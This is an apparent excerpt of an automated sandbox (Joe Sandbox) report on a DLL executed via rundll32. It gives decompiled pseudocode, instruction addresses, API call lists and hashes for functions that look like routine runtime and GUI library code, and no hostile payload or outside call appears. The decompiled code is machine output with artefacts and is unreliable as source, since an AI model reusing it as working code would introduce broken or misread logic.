                                                                        0x1001127f
                                                                        0x00000000
                                                                        0x1001127f
                                                                        0x1001125f
                                                                        0x10011264
                                                                        0x10011266
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001126a
                                                                        0x1001126f
                                                                        0x10011272
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10011274
                                                                        0x00000000
                                                                        0x10011274
                                                                        0x10011229
                                                                        0x10011229
                                                                        0x10011229

                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100111BE
                                                                        • GetCommandLineA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10011238
                                                                          • Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
                                                                          • Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
                                                                          • Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
                                                                          • Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
                                                                          • Part of subcall function 1001666B: FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C
                                                                          • Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
                                                                          • Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                        • FlsSetValue.KERNEL32(00000000,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100112DB
                                                                        • GetCurrentThreadId.KERNEL32 ref: 100112EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$ByteCharMultiWide$AllocateCommandCurrentFreeHeapLineThreadValueVersion__lock
                                                                        • String ID:
                                                                        • API String ID: 770256606-0
                                                                        • Opcode ID: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
                                                                        • Instruction ID: a119cf37508875902a7ac88b5959fce435ef45eee062e48075b7e26cf38889a7
                                                                        • Opcode Fuzzy Hash: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
                                                                        • Instruction Fuzzy Hash: 7D31F635904312DBF728DFB08D8669A77E4EF05792F10412EF860CE552EB30EAC08B61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10030582 Relevance: 6.1, APIs: 4, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E10030582(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				void* __esi;
				void* __ebp;
				signed char _t60;
				signed char _t65;
				intOrPtr _t67;
				signed int _t73;
				void* _t76;
				intOrPtr _t83;
				void* _t91;

				_t91 = __eflags;
				_t76 = __ecx;
				_v24 = 1;
				_v20 = 1;
				_push(GetStockObject(0));
				_t83 = E1002934F();
				_v16 = _t83;
				_v8 = E10033F2F(_t83, _t91);
				_t60 =  *(_t76 + 0x74);
				_v12 = _t83;
				if((0x0000a000 & _t60) == 0) {
					__eflags = _t60 & 0x00000050;
					if(__eflags == 0) {
						_v24 = GetSystemMetrics(0x20) - 1;
						_v20 = GetSystemMetrics(0x21) - 1;
						_t65 =  *(_t76 + 0x78);
						__eflags = 0x0000a000 & _t65;
						if((0x0000a000 & _t65) == 0) {
							L6:
							__eflags = _t65 & 0x00000050;
							if(__eflags == 0) {
								L9:
							} else {
								__eflags =  *(_t76 + 0x7c);
								if(__eflags == 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						} else {
							__eflags =  *(_t76 + 0x7c);
							if(__eflags != 0) {
								goto L6;
							}
						}
						_v12 = _v8;
					} else {
					}
				} else {
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_a4 != 0) {
					_v20 = 0;
					_v24 = 0;
				}
				if(( *(_t76 + 0x75) & 0x000000f0) != 0) {
					InflateRect( &_v40, 0xffffffff, 0xffffffff);
				}
				_t95 =  *(_t76 + 0x24);
				_t67 = _v8;
				if( *(_t76 + 0x24) == 0) {
					_t67 = _v16;
				}
				E10033FCE( *((intOrPtr*)(_t76 + 0x84)), _t95,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
				asm("movsd");
				_t73 = 0 | _v12 == _v8;
				asm("movsd");
				 *(_t76 + 0x24) = _t73;
				return _t73;
			}


















                                                                        0x10030582
                                                                        0x10030590
                                                                        0x10030592
                                                                        0x10030595
                                                                        0x1003059e
                                                                        0x100305a4
                                                                        0x100305a6
                                                                        0x100305ae
                                                                        0x100305b1
                                                                        0x100305b4
                                                                        0x100305be
                                                                        0x100305c5
                                                                        0x100305c8
                                                                        0x100305dc
                                                                        0x100305e2
                                                                        0x100305e5
                                                                        0x100305e8
                                                                        0x100305ea
                                                                        0x100305f2
                                                                        0x100305f2
                                                                        0x100305f5
                                                                        0x10030602
                                                                        0x100305f7
                                                                        0x100305f7
                                                                        0x100305fb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100305fb
                                                                        0x100305ec
                                                                        0x100305ec
                                                                        0x100305f0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100305f0
                                                                        0x10030608
                                                                        0x100305ca
                                                                        0x100305ca
                                                                        0x100305c0
                                                                        0x100305c0
                                                                        0x1003060e
                                                                        0x1003060f
                                                                        0x10030610
                                                                        0x10030611
                                                                        0x10030617
                                                                        0x10030619
                                                                        0x1003061c
                                                                        0x1003061c
                                                                        0x10030623
                                                                        0x1003062d
                                                                        0x1003062d
                                                                        0x10030633
                                                                        0x10030636
                                                                        0x10030639
                                                                        0x1003063b
                                                                        0x1003063b
                                                                        0x1003065c
                                                                        0x1003066a
                                                                        0x1003066b
                                                                        0x10030671
                                                                        0x10030672
                                                                        0x1003067a
                                                                        0x1003067b
                                                                        0x1003067e
                                                                        0x10030681
                                                                        0x10030686

                                                                        APIs
                                                                        • GetStockObject.GDI32(00000000), ref: 10030598
                                                                          • Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
                                                                          • Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
                                                                          • Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
                                                                        • String ID:
                                                                        • API String ID: 3923860780-0
                                                                        • Opcode ID: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
                                                                        • Instruction ID: 9af8668bb33911b9f969ea6b6b6f254ec0c1e141af5f513437efede38b15d734
                                                                        • Opcode Fuzzy Hash: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
                                                                        • Instruction Fuzzy Hash: BF410371D016199FDF42CFA4C980A9EBBF5EB48351F1142A5E911AB29AD370AE41CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002084F Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E1002084F(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x48)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E1001E0CB( *((intOrPtr*)(_t49 + 0x48)) + 0x3c, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E10006D96( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E10006D96( &_a4)));
								_v8 =  *((intOrPtr*)(E10006D96( &_a4)));
								if((E1002049B(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E10006DAF( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E10006DAF( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E1002049B(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}












                                                                        0x10020852
                                                                        0x10020853
                                                                        0x10020856
                                                                        0x1002085d
                                                                        0x10020863
                                                                        0x10020868
                                                                        0x10020878
                                                                        0x10020891
                                                                        0x10020899
                                                                        0x100208a1
                                                                        0x100208a4
                                                                        0x100208ae
                                                                        0x100208ef
                                                                        0x100208c4
                                                                        0x100208c8
                                                                        0x100208d5
                                                                        0x00000000
                                                                        0x100208d7
                                                                        0x100208d7
                                                                        0x100208dd
                                                                        0x00000000
                                                                        0x1002094a
                                                                        0x1002094a
                                                                        0x1002094a
                                                                        0x00000000
                                                                        0x1002094a
                                                                        0x100208dd
                                                                        0x00000000
                                                                        0x100208d5
                                                                        0x100208fa
                                                                        0x10020904
                                                                        0x10020943
                                                                        0x1002091a
                                                                        0x1002091f
                                                                        0x10020922
                                                                        0x10020937
                                                                        0x10020937
                                                                        0x10020941
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10020924
                                                                        0x10020932
                                                                        0x00000000
                                                                        0x10020934
                                                                        0x10020934
                                                                        0x00000000
                                                                        0x10020934
                                                                        0x10020932
                                                                        0x00000000
                                                                        0x10020922
                                                                        0x1002087a
                                                                        0x10020883
                                                                        0x10020888
                                                                        0x1002088b
                                                                        0x1002094d
                                                                        0x10020956
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002088b
                                                                        0x10020958
                                                                        0x10020958
                                                                        0x10020868
                                                                        0x1002095c

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
                                                                        • Instruction ID: 409e1e54ae5c96ed2e58890ddbbbae16c890d09ac2c6be6a3a2fbe05691f9f0c
                                                                        • Opcode Fuzzy Hash: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
                                                                        • Instruction Fuzzy Hash: 29315C30A00219EFDB15DF55D890EAE3BAAEF45390F50806AF54A9B213DA71ED80DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10026B4F Relevance: 6.1, APIs: 4, Instructions: 103stringtimeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10026B4F(void* __ecx, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* _t43;
				long _t48;
				signed int* _t51;
				signed int* _t54;
				signed int* _t57;
				struct _FILETIME* _t67;
				void* _t81;
				CHAR* _t82;
				signed int* _t83;
				void* _t86;

				_t83 = _a4;
				_t81 = __ecx;
				E10011C50(_t83, 0, 0x128);
				lstrcpynA( &(_t83[8]),  *(_t81 + 0xc), 0x104);
				_t43 =  *(_t81 + 4);
				_t86 = _t43 -  *0x100401d4; // 0xffffffff
				if(_t86 == 0) {
					L12:
					return 1;
				}
				_t67 =  &_v12;
				if(GetFileTime(_t43, _t67,  &_v20,  &_v28) == 0) {
					L4:
					return 0;
				}
				_t48 = GetFileSize( *(_t81 + 4), 0);
				_t83[6] = _t48;
				_t83[7] = 0;
				if(_t48 != 0xffffffff || 0 != 0) {
					_t82 =  *(_t81 + 0xc);
					if( *((intOrPtr*)(_t82 - 0xc)) != 0) {
						_t83[8] = (_t67 & 0xffffff00 | GetFileAttributesA(_t82) == 0xffffffff) - 0x00000001 & _t49;
					} else {
						_t83[8] = 0;
					}
					_t51 = E10010239(0,  &_v36, _t82,  &_v12, 0xffffffff);
					 *_t83 =  *_t51;
					_t83[1] = _t51[1];
					_t54 = E10010239(0,  &_v36, _t82,  &_v20, 0xffffffff);
					_t83[4] =  *_t54;
					_t83[5] = _t54[1];
					_t57 = E10010239(0,  &_v36, _t82,  &_v28, 0xffffffff);
					_t83[2] =  *_t57;
					_t83[3] = _t57[1];
					if(( *_t83 | _t83[1]) == 0) {
						 *_t83 =  *_t57;
						_t83[1] = _t57[1];
					}
					if((_t83[4] | _t83[5]) == 0) {
						_t83[4] = _t83[2];
						_t83[5] = _t83[3];
					}
					goto L12;
				} else {
					goto L4;
				}
			}



















                                                                        0x10026b57
                                                                        0x10026b64
                                                                        0x10026b66
                                                                        0x10026b7a
                                                                        0x10026b80
                                                                        0x10026b83
                                                                        0x10026b89
                                                                        0x10026c56
                                                                        0x00000000
                                                                        0x10026c58
                                                                        0x10026b97
                                                                        0x10026ba4
                                                                        0x10026bbf
                                                                        0x00000000
                                                                        0x10026bbf
                                                                        0x10026baa
                                                                        0x10026bb3
                                                                        0x10026bb6
                                                                        0x10026bb9
                                                                        0x10026bc6
                                                                        0x10026bcc
                                                                        0x10026be4
                                                                        0x10026bce
                                                                        0x10026bce
                                                                        0x10026bce
                                                                        0x10026bf0
                                                                        0x10026bf7
                                                                        0x10026bfc
                                                                        0x10026c08
                                                                        0x10026c0f
                                                                        0x10026c15
                                                                        0x10026c21
                                                                        0x10026c28
                                                                        0x10026c2e
                                                                        0x10026c36
                                                                        0x10026c3a
                                                                        0x10026c3f
                                                                        0x10026c3f
                                                                        0x10026c48
                                                                        0x10026c4d
                                                                        0x10026c53
                                                                        0x10026c53
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • lstrcpynA.KERNEL32(?,?,00000104), ref: 10026B7A
                                                                        • GetFileTime.KERNEL32(?,?,?,?), ref: 10026B9C
                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 10026BAA
                                                                        • GetFileAttributesA.KERNEL32(?), ref: 10026BD4
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesSizeTimelstrcpyn
                                                                        • String ID:
                                                                        • API String ID: 1499663573-0
                                                                        • Opcode ID: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
                                                                        • Instruction ID: a18b0f555d231170b7735eacb595d982f5b9ad02e146dd108c4f4c0e1a6c5240
                                                                        • Opcode Fuzzy Hash: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
                                                                        • Instruction Fuzzy Hash: 06419CB56006059FC724DFA4DD84CAABBF8FF093103508A2EE1A6D76A0E730F944CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000C29A Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 29%
                                                                        			E1000C29A(void* _a4, intOrPtr _a8) {
				char _v8;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr* _t49;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t71;

				_t71 = _a4 + 0xffffff2c;
				if( *((intOrPtr*)(_t71 + 0x84)) != 0) {
					return 0;
				}
				_t58 = _a8;
				if( *((intOrPtr*)(_t71 + 0x8c)) != 0) {
					L4:
					if( *((intOrPtr*)(_t71 + 0x98)) == _t58) {
						__imp__#9(_t71 + 0xa8);
						_t41 =  *((intOrPtr*)(_t71 + 0x4c));
						_push( &_a4);
						_push(0x10043098);
						_a4 = 0;
						_push(_t41);
						if( *((intOrPtr*)( *_t41))() >= 0) {
							E10011C50( &_v56, 0, 0x20);
							E10011C50( &_v24, 0, 0x10);
							_t47 = _a4;
							_t48 =  *((intOrPtr*)( *_t47 + 0x18))(_t47, _t58, 0x10043018, 0, 2,  &_v24, _t71 + 0xa8,  &_v56,  &_v8);
							_t60 = __imp__#6;
							_a8 = _t48;
							if(_v52 != 0) {
								 *_t60(_v52);
							}
							if(_v48 != 0) {
								 *_t60(_v48);
							}
							if(_v44 != 0) {
								 *_t60(_v44);
							}
							_t49 = _a4;
							 *((intOrPtr*)( *_t49 + 8))(_t49);
							if(_a8 >= 0) {
								 *((intOrPtr*)(_t71 + 0xa4)) = 1;
							}
						}
					}
					_t39 = 0;
					goto L15;
				} else {
					_v60 = 2;
					_v56 = _t58;
					_v52 = 0;
					_v48 = 0;
					_v44 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					E1000A823(_t71,  &_v60);
					_t39 = _v36;
					if(_t39 != 0) {
						L15:
						return _t39;
					}
					goto L4;
				}
			}





















                                                                        0x1000c2a5
                                                                        0x1000c2b3
                                                                        0x00000000
                                                                        0x1000c2b5
                                                                        0x1000c2c3
                                                                        0x1000c2c6
                                                                        0x1000c2fa
                                                                        0x1000c300
                                                                        0x1000c30d
                                                                        0x1000c313
                                                                        0x1000c319
                                                                        0x1000c31a
                                                                        0x1000c31f
                                                                        0x1000c324
                                                                        0x1000c329
                                                                        0x1000c332
                                                                        0x1000c33e
                                                                        0x1000c343
                                                                        0x1000c368
                                                                        0x1000c36e
                                                                        0x1000c374
                                                                        0x1000c377
                                                                        0x1000c37c
                                                                        0x1000c37c
                                                                        0x1000c381
                                                                        0x1000c386
                                                                        0x1000c386
                                                                        0x1000c38b
                                                                        0x1000c390
                                                                        0x1000c390
                                                                        0x1000c392
                                                                        0x1000c398
                                                                        0x1000c39e
                                                                        0x1000c3a0
                                                                        0x1000c3a0
                                                                        0x1000c39e
                                                                        0x1000c329
                                                                        0x1000c3aa
                                                                        0x00000000
                                                                        0x1000c2c8
                                                                        0x1000c2ce
                                                                        0x1000c2d5
                                                                        0x1000c2d8
                                                                        0x1000c2db
                                                                        0x1000c2de
                                                                        0x1000c2e1
                                                                        0x1000c2e4
                                                                        0x1000c2e7
                                                                        0x1000c2ea
                                                                        0x1000c2ef
                                                                        0x1000c2f4
                                                                        0x1000c3ac
                                                                        0x00000000
                                                                        0x1000c3ac
                                                                        0x00000000
                                                                        0x1000c2f4

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: FreeString$ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 3349467263-0
                                                                        • Opcode ID: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
                                                                        • Instruction ID: 552477abdee19e13ea1b462c0c8e49e77f6f834a68e9ea303e894a8b6247ec6d
                                                                        • Opcode Fuzzy Hash: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
                                                                        • Instruction Fuzzy Hash: E3310571A10229BFDB04DFA5C884EDEBBB9FF08790F10811AF559A6245C770AA54CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001C5D1 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 88%
                                                                        			E1001C5D1(void* __ecx, void* __eflags) {
				short* _t40;
				intOrPtr _t42;
				int _t57;
				short* _t63;
				int _t65;
				void* _t66;
				short* _t67;

				_t58 = __ecx;
				_t67 =  *(_t66 - 0x18);
				E10010839(__ecx, __eflags);
				 *(_t66 - 0x34) =  *(_t66 - 0x34) & 0x00000000;
				 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
				_t57 =  *(_t66 - 0x48);
				_t65 = 1;
				_t63 = 0;
				_t40 =  *(_t66 - 0x34);
				if(_t40 != 0) {
					L4:
					if(MultiByteToWideChar( *(_t66 + 0x20), _t65,  *(_t66 + 0x10),  *(_t66 + 0x14), _t40, _t57) != 0) {
						_t65 = MultiByteToWideChar( *(_t66 + 0x20), 9,  *(_t66 + 0x18),  *(_t66 + 0x1c), 0, 0);
						 *(_t66 - 0x4c) = _t65;
						if(_t65 != 0) {
							 *(_t66 - 4) = 1;
							E10010B20(_t65 + _t65 + 0x00000003 & 0xfffffffc, _t58);
							 *(_t66 - 0x18) = _t67;
							_t63 = _t67;
							 *(_t66 - 0x50) = _t63;
							 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
							if(_t63 != 0) {
								L10:
								if(MultiByteToWideChar( *(_t66 + 0x20), 1,  *(_t66 + 0x18),  *(_t66 + 0x1c), _t63, _t65) != 0) {
									 *((intOrPtr*)(_t66 - 0x40)) = CompareStringW( *(_t66 + 8),  *(_t66 + 0xc),  *(_t66 - 0x34), _t57, _t63, _t65);
								}
								_t78 =  *(_t66 - 0x44);
								if( *(_t66 - 0x44) != 0) {
									_push(_t63);
									E100107C8(_t57, _t63, _t65, _t78);
								}
							} else {
								_t63 = E100107B6(_t65 + _t65);
								if(_t63 != 0) {
									 *(_t66 - 0x44) = 1;
									goto L10;
								}
							}
						}
					}
					_t79 =  *((intOrPtr*)(_t66 - 0x3c));
					if( *((intOrPtr*)(_t66 - 0x3c)) != 0) {
						_push( *(_t66 - 0x34));
						E100107C8(_t57, _t63, _t65, _t79);
					}
					_t42 =  *((intOrPtr*)(_t66 - 0x40));
				} else {
					_t40 = E100107B6(_t57 + _t57);
					_pop(_t58);
					 *(_t66 - 0x34) = _t40;
					if(_t40 == 0) {
						_t42 = 0;
					} else {
						 *((intOrPtr*)(_t66 - 0x3c)) = 1;
						goto L4;
					}
				}
				return E1001254F(E100117AE(_t42,  *((intOrPtr*)(_t66 - 0x1c))));
			}










                                                                        0x1001c5d1
                                                                        0x1001c5d1
                                                                        0x1001c5d4
                                                                        0x1001c5d9
                                                                        0x1001c5dd
                                                                        0x1001c5e1
                                                                        0x1001c5e6
                                                                        0x1001c5e7
                                                                        0x1001c5e9
                                                                        0x1001c5ee
                                                                        0x1001c608
                                                                        0x1001c61c
                                                                        0x1001c637
                                                                        0x1001c639
                                                                        0x1001c63e
                                                                        0x1001c644
                                                                        0x1001c654
                                                                        0x1001c659
                                                                        0x1001c65c
                                                                        0x1001c65e
                                                                        0x1001c661
                                                                        0x1001c681
                                                                        0x1001c69a
                                                                        0x1001c6af
                                                                        0x1001c6c3
                                                                        0x1001c6c3
                                                                        0x1001c6c6
                                                                        0x1001c6ca
                                                                        0x1001c6cc
                                                                        0x1001c6cd
                                                                        0x1001c6d2
                                                                        0x1001c683
                                                                        0x1001c68d
                                                                        0x1001c691
                                                                        0x1001c693
                                                                        0x00000000
                                                                        0x1001c693
                                                                        0x1001c691
                                                                        0x1001c681
                                                                        0x1001c63e
                                                                        0x1001c6d3
                                                                        0x1001c6d7
                                                                        0x1001c6d9
                                                                        0x1001c6dc
                                                                        0x1001c6e1
                                                                        0x1001c6e2
                                                                        0x1001c5f0
                                                                        0x1001c5f4
                                                                        0x1001c5f9
                                                                        0x1001c5fa
                                                                        0x1001c5ff
                                                                        0x1001c717
                                                                        0x1001c605
                                                                        0x1001c605
                                                                        0x00000000
                                                                        0x1001c605
                                                                        0x1001c5ff
                                                                        0x1001c7a8

                                                                        APIs
                                                                          • Part of subcall function 10010839: VirtualQuery.KERNEL32(?,?,0000001C), ref: 10010853
                                                                          • Part of subcall function 10010839: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10010864
                                                                          • Part of subcall function 10010839: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 100108AA
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C614
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,100101C3,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C631
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,100101C3,?,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C6A7
                                                                        • CompareStringW.KERNEL32(?,?,00000190,00000000,?,00000000,?,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001C6BD
